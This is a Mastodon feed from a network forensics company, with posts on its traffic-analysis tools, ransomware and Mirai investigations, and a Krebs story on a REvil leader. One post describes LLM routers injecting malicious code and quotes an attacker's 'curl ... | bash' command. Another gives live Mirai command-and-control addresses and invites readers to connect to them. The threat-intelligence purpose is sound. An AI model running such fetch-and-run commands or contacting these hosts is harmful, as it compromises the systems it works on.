π™½π™΄πšƒπšπ™΄πš‚π™΄π™²

@[email protected]
1.2K Followers
627 Following
464 Posts

Experts in Network Forensics and Network Security Monitoring. Creators of #NetworkMiner, #CapLoader, #PolarProxy, #FlowCarp and #RawCap.

#PCAP or it didn't happen!

Bloghttps://www.netresec.com/?page=Blog
Blueskyhttps://bsky.app/profile/netresec.com
Twitterhttps://x.com/netresec
GitHubhttps://github.com/Netresec
RSShttps://www.netresec.com/rss.ashx
π™½π™΄πšƒπšπ™΄πš‚π™΄π™²3d ago
Krypt3ia4d ago
https://krypt3ia.wordpress.com/2026/05/13/cyber-supply-chain-attacks-early-internet-to-today/ thing done.
π™½π™΄πšƒπšπ™΄πš‚π™΄π™²4d ago
Show threadπ™½π™΄πšƒπšπ™΄πš‚π™΄π™²4d ago

@sans_isc Yay, proxifier to the rescue!

Got a cool use for a tool like this? Give it a try and share your experiences [...]

Proxifier is also useful when trying to intercept and decrypt TLS traffic from a Windows Sandbox.

PolarProxy in Windows Sandbox

In this video I demonstrate how PolarProxy can be run in a Windows Sandbox to intercept and decrypt outgoing TLS communication. This setup can be used to inspect otherwise encrypted traffic from malware or suspicious Windows applications, which communicate over HTTPS or some other TLS encrypted prot[...]

Netresec
π™½π™΄πšƒπšπ™΄πš‚π™΄π™²4d ago
SANS Internet Storm Center - SANS.edu - Go Sentinels!4d ago
Proxying the Unproxyable – Sending EXE traffic to a Proxy https://isc.sans.edu/diary/32982
π™½π™΄πšƒπšπ™΄πš‚π™΄π™²5d ago
The DFIR Report5d ago

Flash Alert: EtherRat and TukTuk C2 End in The Gentleman Ransomware

In April, we observed an intrusion that began with a malicious MSI masquerading as Sysinternals RAMMap and ended in domain-wide deployment of The Gentlemen ransomware.

Detection opportunities included!

Full report: https://thedfirreport.com/2026/05/11/flash-alert-etherrat-and-tuktuk-c2-end-in-the-gentleman-ransomware/

#ThreatIntel #ThreatHunting #DigitalForensics

π™½π™΄πšƒπšπ™΄πš‚π™΄π™²May 8
Viewing #remcos alerts from FlowCarp in @ish's #EveBox
https://netresec.com/?b=2659fc0
Remcos Alerts from FlowCarp in EveBox

There is a wonderful little web based alert and event front-end called EveBox, which renders Eve JSON formatted data to a graphical user interface. This blog post demonstrates how EveBox can be used to show alert and flow information that FlowCarp has extracted from a Remcos malware infection. Remco[...]

Netresec
π™½π™΄πšƒπšπ™΄πš‚π™΄π™²May 6

Found an odd Telnet like connection in a Mirai malware execution. Follow these steps to see for yourself:
telnet 45.149.186.18 8080
Enter: newsrv

πŸ”₯ nivela.duckdns[.]org:8080
πŸ”₯ 45.149.186.18:8080
πŸ”₯ b8d37e1ba85e8cebd9802b31747a1689

#Mirai #OWARI

π™½π™΄πšƒπšπ™΄πš‚π™΄π™²May 4

New tool released: FlowCarp
πŸ” Identifies protocols without port numbers
πŸ”¨ Build protocol detection from example traffic
➑️ Input: PCAP or PcapNG
⬅️ Output: Flows and/or Alerts
https://netresec.com/?b=265d268

#FlowCarp

FlowCarp Identifies Protocols

I am thrilled to announce the release of a brand new tool called FlowCarp! FlowCarp is a simple command line tool that performs a very complicated task. It identifies the application layer protocol in network traffic without relying on port numbers, static signatures or code that tries to parse the[...]

Netresec
π™½π™΄πšƒπšπ™΄πš‚π™΄π™²Apr 29
BradApr 23

2026-04-23 (Thursday): #SmartApeSG campaign using #ClickFix instructions to push some sort of #RAT.

I'm still not sure what this #malware is yet, but it looks like a RAT.

Details, some more images, and a #pcap of the traffic are available at https://www.malware-traffic-analysis.net/2026/04/23/index.html

π™½π™΄πšƒπšπ™΄πš‚π™΄π™²Apr 15

Researchers found 8 free and 1 paid (!!!) LLM routers actively injecting malicious code and one attempting to steal ETH 

This architecture creates a trust relationship that has received little scrutiny. The β€œrouter-in-the-middle” is not an accidental on-path adversary but an intentionally configured intermediary with application-layer authority over both requests and responses. Unlike a traditional network MITM, no TLS downgrade or certificate forgery is required.

One attacker-controlled endpoint from the LiteLLM supply chain attack replaced legitimate calls from an upstream provider:
curl -sSL https://get.example.com/cli.sh | bash
and instead sent something like this to the client:
curl -sSL https://attacker****.sh | bash

π™½π™΄πšƒπšπ™΄πš‚π™΄π™²Apr 7
BrianKrebsApr 6

New, by me: An elusive hacker who went by the handle β€œUNKN” and ran the early Russian ransomware groups GandCrab and REvil now has a name and a face. Authorities in Germany say 31-year-old Russian Daniil Maksimovich Shchukin headed both cybercrime gangs and helped carry out at least 130 acts of computer sabotage and extortion against victims across the country between 2019 and 2021. From the story:

UNKNOWN also gave an interview to Dmitry Smilyanets, a former malicious hacker hired by Recorded Future, wherein UNKNOWN described a rags-to-riches tale unencumbered by ethics and morals.

β€œAs a child, I scrounged through the trash heaps and smoked cigarette butts,” UNKNOWN told Recorded Future. β€œI walked 10 km one way to the school. I wore the same clothes for six months. In my youth, in a communal apartment, I didn’t eat for two or even three days. Now I am a millionaire.”

https://krebsonsecurity.com/2026/04/germany-doxes-unkn-head-of-ru-ransomware-gangs-revil-gandcrab/